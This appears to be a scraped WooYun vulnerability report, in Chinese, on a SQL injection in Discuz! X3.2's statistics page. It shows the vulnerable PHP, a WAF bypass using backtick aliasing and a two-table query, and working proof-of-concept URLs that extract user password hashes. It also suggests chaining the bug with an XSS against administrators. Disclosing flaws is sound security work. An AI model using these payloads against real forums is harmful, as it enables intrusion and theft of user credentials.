Discuz x3.2前台GET型SQL注入漏洞（绕过全局WAF）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-074970

漏洞标题：Discuz x3.2前台GET型SQL注入漏洞（绕过全局WAF）

漏洞作者： phith0n

提交时间：2014-09-04 10:15

修复时间：2014-12-03 10:16

公开时间：2014-12-03 10:16

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-09-04：细节已通知厂商并且等待厂商处理中
2014-09-04：厂商已经确认，细节仅向厂商公开
2014-09-07：细节向第三方安全合作伙伴开放
2014-10-29：细节向核心白帽子及相关领域专家公开
2014-11-08：细节向普通白帽子公开
2014-11-18：细节向实习白帽子公开
2014-12-03：细节向公众公开

简要描述：

前台非盲注，只需要配合一个xss，就能消除鸡肋了。
信pandas，得永生，紧抱doggy哥大腿！

详细说明：

/source/include/misc/misc_stat.php 46行：

if(!empty($_GET['xml'])) {
	$xaxis = '';
	$graph = array();
	$count = 1;
	$begin = dgmdate($beginunixstr, 'Ymd');
	$end = dgmdate($endunixstr, 'Ymd');
	$field = '*';
	if(!empty($_GET['merge'])) {
		if(empty($_GET['types'])) {
			$_GET['types'] = array_merge($cols['login'], $cols['forum'], $cols['tgroup'], $cols['home'], $cols['space']);
		}
		$field = 'daytime,`'.implode('`+`', $_GET['types']).'` AS statistic';
		$type = 'statistic';
	}
	foreach(C::t('common_stat')->fetch_all($begin, $end, $field) as $value) {
		$xaxis .= "<value xid='$count'>".substr($value['daytime'], 4, 4)."</value>";
		if($type == 'all') {
			foreach ($cols as $ck => $cvs) {
				if($ck == 'login') {
					$graph['login'] .= "<value xid='$count'>$value[login]</value>";
					$graph['register'] .= "<value xid='$count'>$value[register]</value>";
				} else {
					$num = 0;
					foreach ($cvs as $cvk) {
						$num = $value[$cvk] + $num;
					}
					$graph[$ck] .= "<value xid='$count'>".$num."</value>";
				}
			}
		} else {
			//var_dump($value);exit;
			if(empty($_GET['types']) || !empty($_GET['merge'])) {
				$graph[$type] .= "<value xid='$count'>".$value[$type]."</value>";
			} else {
				foreach($_GET['types'] as $t) {
					$graph[$t] .= "<value xid='$count'>".$value[$t]."</value>";
				}
			}
		}
		$count++;
	}
	$xml = '';
	$xml .= '<'."?xml version=\"1.0\" encoding=\"utf-8\"?>";
	$xml .= '<chart><xaxis>';
	$xml .= $xaxis;
	$xml .= "</xaxis><graphs>";
	$count = 0;
	foreach ($graph as $key => $value) {
		$xml .= "<graph gid='$count' title='".diconv(lang('spacecp', "do_stat_$key"), CHARSET, 'utf8')."'>";
		$xml .= $value;
		$xml .= '</graph>';
		$count++;
	}
	$xml .= '</graphs></chart>';
	@header("Expires: -1");
	@header("Cache-Control: no-store, private, post-check=0, pre-check=0, max-age=0", FALSE);
	@header("Pragma: no-cache");
	@header("Content-type: application/xml; charset=utf-8");
	echo $xml;
	exit();
}

见这一句：

$field = 'daytime,`'.implode('`+`', $_GET['types']).'` AS statistic';

将$_GET['type']数组直接用`+`分割，并没有过滤。
因为位置在$field的地方，并不在单引号中，所以不用引入单引号，也无需考虑addslashes。
现在遇到另一个问题，怎么绕过discuz3.2的WAF？
不绕过也没法出数据。
我们先看看输出点在何处：

http://localhost/bbs/misc.php?mod=stat&op=trend&xml=1&merge=1&types[1]=x

也就是说我们可以控制的部分有很多。
且不看全局防注入源码，黑盒试一下我发现一旦出现'、(就会拦截，而且注释符（#、--）也会拦截。
括号不能有，就特别拙计，因为很多盲注需要括号，子查询也需要括号，函数也需要括号，这里都不能用了。

SELECT daytime,`aaa` AS statistic FROM common_stat WHERE daytime>=20140805 AND daytime<=20140904 ORDER BY daytime

我们再看上述sql语句，发现我们可控的部分前面，还有个daytime。这就愁坏我了，因为我要查询的表是用户表，而用户表根本没这个字段。

执行会提示Unknown column 'daytime' in 'field list'。
所以，我们可以利用mysql的特性，一次查询两个表，将pre_ucenter_members的数据连带着查询出来：

大家可以看到，已经不报错了。因为pre_common_statuser表中存在`daytime`这个列。而且这个表中也有uid这个列，正好可以作为pre_ucenter_members的筛选项。
那么，有的同学再问，sql语句后半部分

` AS statistic FROM common_stat WHERE daytime>=20140805 AND daytime<=20140904 ORDER BY daytime

没有注释符怎么处理？
这里有个巧合，在某些情况下，`能作为注释符用。因为mysql会自动给sql语句结尾没有闭合的`闭合掉，这样，只要让mysql人为后面那一大串字符是一个字段的“别名”即可。
所以，先构造一个url：

http://localhost/bbs/misc.php?mod=stat&op=trend&xml=1&merge=1&types[1]=password`as%20daytime%20from%20pre_common_statuser,pre_ucenter_members%20as

可以看到已经出数据了。但发现出来的数据只有4位。
原因是，在源码中使用了substr取了daytime的第4到8位：

$xaxis .= "<value xid='$count'>".substr($value['daytime'], 4, 4)."</value>";

我们看下有没其他的输出点。于是找到了一个：

if(empty($_GET['types']) || !empty($_GET['merge'])) {
				$graph[$type] .= "<value xid='$count'>".$value[$type]."</value>";
			}

这个if语句，其中$type为statistic，而将$value[$type]的值输出了。所以，我只需将password取个别名叫statistic，就能输出password了。
那么，最后的poc就是：

http://localhost/bbs/misc.php?mod=stat&op=trend&xml=1&merge=1&types[1]=password`as%20statistic%20from%20pre_common_statuser,pre_ucenter_members%20as

本地测试效果：

这个漏洞鸡肋之处在于，虽然它是一个前台的注入（无需登录后台），但是却需要管理员权限。
所以，利用方法就是找到一个前台xss，管理员（前台管理）访问以后用javascript获得访问到的页面内容，即可获得注入出的信息。使鸡肋漏洞变得不再鸡肋。
或者利用某些浏览器的跨域漏洞，也能注入。

漏洞证明：

http://target/misc.php?mod=stat&op=trend&xml=1&merge=1&types[1]=password`as%20statistic%20from%20pre_common_statuser,pre_ucenter_members%20as

修复方案：

过滤。

版权声明：转载请注明来源 phith0n@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-09-04 10:29

厂商回复：

感谢您提出的问题，我们会尽快处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-074970

漏洞标题：Discuz x3.2前台GET型SQL注入漏洞（绕过全局WAF）

相关厂商：Discuz!

漏洞作者： phith0n

提交时间：2014-09-04 10:15

修复时间：2014-12-03 10:16

公开时间：2014-12-03 10:16

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 phith0n@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-074970

漏洞标题：Discuz x3.2前台GET型SQL注入漏洞（绕过全局WAF）

相关厂商：Discuz!

漏洞作者： phith0n

提交时间：2014-09-04 10:15

修复时间：2014-12-03 10:16

公开时间：2014-12-03 10:16

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-074970"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 phith0n@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：